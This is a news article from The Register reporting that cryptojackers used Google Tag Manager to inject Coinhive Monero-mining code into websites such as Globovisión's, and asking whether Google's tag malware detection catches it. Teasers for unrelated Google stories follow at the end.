Crypto-jackers enlist Google Tag Manager to smuggle alt-coin miners

Ad giant has malware detection in its script-hosting service... but Coinhive isn't flagged

Crypto-jackers using Coin Hive code to secretly mine Monero via computing power supplied by the unsuspecting have found Google Tag Manager to be a convenient means of distribution.

Security researcher Troy Mursch told The Register that he recently found Coinhive's free-to-use JavaScript running on the Globovisión website – Globovisión being a 24-hour telly station for Venezuela and Latin America.

The code was invisibly spawned, he said, "from the embedded Google Tag Manager script gtm.js?id=GTM-KCDXG2D," which invoked cryptonight.wasm, a Web Assembly form of Coin Hive's JavaScript mining code.

Google Tag Manager allows marketers, or anyone else with a website, to create code – dubbed a tag – that can be placed in webpages to dynamically inject JavaScript snippets rather than using hardcoded JavaScript in those files.

Google's service, handily enough, provides more control and flexibility than static code delivery.

Because the code gets served by Google Tag Manager, it's not present in the source files on a web server. The JavaScript file and appended parameter gtm.js?id=GTM-KCDXG2D don't say anything about the function of the code invoked. Essentially, miscreants are hacking websites and quietly adding Google-hosted tags that contain the malicious code-mining code, thus obfuscating the source of the scripts.

Mursch said the Globovisión mining code was removed within an hour of discovery, and it's not clear how it got there. He found the Monero-crafting JS, he said, while reviewing another crypto-jacking incident with a Brazilian singer's website.

Google did not immediately respond to a request for comment.

A month ago, when The Register reported that Google short URLs were being co-opted for Monero, there were about 113,000 instances of cryptonight mining. Presently, there are about 180,000.

The Chocolate Factory's Tag Manager Terms of Service prohibits misuse, and the ad distribution biz has systems in place to look for malware in tags and prevent them from firing when found.

"In most cases, affected users are unaware that there are tags serving malware from their containers," the web giant explained on its website. "Usually through no fault of your own, a network provider becomes malware infected when they install 3rd party libraries or templates onto their websites, and subsequently transmit that malware to your site via the custom HTML tag that you published onto your website via Tag Manager."

That being the case, it appears that Google either cannot detect Coinhive code through Tag Manager or it doesn't consider it to be malicious. Most ad blockers, as well as antivirus tools, kill Coin Hive's code on sight these days.

Coinhive's development team did not respond to a request for comment.

Noting that crypto-jacking tops Malwarebytes' list of security ills likely to be visited upon businesses and consumers in 2018, Mursch said: "We should expect this trend to continue." ®

Broader topics

Other stories you might like

  • Google has more reasons why it doesn't like antitrust law that affects Google
    It'll ruin Gmail, claims web ads giant

    Google has a fresh list of reasons why it opposes tech antitrust legislation making its way through Congress but, like others who've expressed discontent, the ad giant's complaints leave out mention of portions of the proposed law that address said gripes.

    The law bill in question is S.2992, the Senate version of the American Innovation and Choice Online Act (AICOA), which is closer than ever to getting votes in the House and Senate, which could see it advanced to President Biden's desk.

    AICOA prohibits tech companies above a certain size from favoring their own products and services over their competitors. It applies to businesses considered "critical trading partners," meaning the company controls access to a platform through which business users reach their customers. Google, Apple, Amazon, and Meta in one way or another seemingly fall under the scope of this US legislation. 

    Continue reading
  • I was fired for blowing the whistle on cult's status in Google unit, says contractor
    The internet giant, a doomsday religious sect, and a lawsuit in Silicon Valley

    A former Google video producer has sued the internet giant alleging he was unfairly fired for blowing the whistle on a religious sect that had all but taken over his business unit. 

    The lawsuit demands a jury trial and financial restitution for "religious discrimination, wrongful termination, retaliation and related causes of action." It alleges Peter Lubbers, director of the Google Developer Studio (GDS) film group in which 34-year-old plaintiff Kevin Lloyd worked, is not only a member of The Fellowship of Friends, the exec was influential in growing the studio into a team that, in essence, funneled money back to the fellowship.

    In his complaint [PDF], filed in a California Superior Court in Silicon Valley, Lloyd lays down a case that he was fired for expressing concerns over the fellowship's influence at Google, specifically in the GDS. When these concerns were reported to a manager, Lloyd was told to drop the issue or risk losing his job, it is claimed. 

    Continue reading
  • End of the road for biz living off free G Suite legacy edition
    Firms accustomed to freebies miffed that web giant's largess doesn't last

    After offering free G Suite apps for more than a decade, Google next week plans to discontinue its legacy service – which hasn't been offered to new customers since 2012 – and force business users to transition to a paid subscription for the service's successor, Google Workspace.

    "For businesses, the G Suite legacy free edition will no longer be available after June 27, 2022," Google explains in its support document. "Your account will be automatically transitioned to a paid Google Workspace subscription where we continue to deliver new capabilities to help businesses transform the way they work."

    Small business owners who have relied on the G Suite legacy free edition aren't thrilled that they will have to pay for Workspace or migrate to a rival like Microsoft, which happens to be actively encouraging defectors. As noted by The New York Times on Monday, the approaching deadline has elicited complaints from small firms that bet on Google's cloud productivity apps in the 2006-2012 period and have enjoyed the lack of billing since then.

    Continue reading

Biting the hand that feeds IT © 1998–2022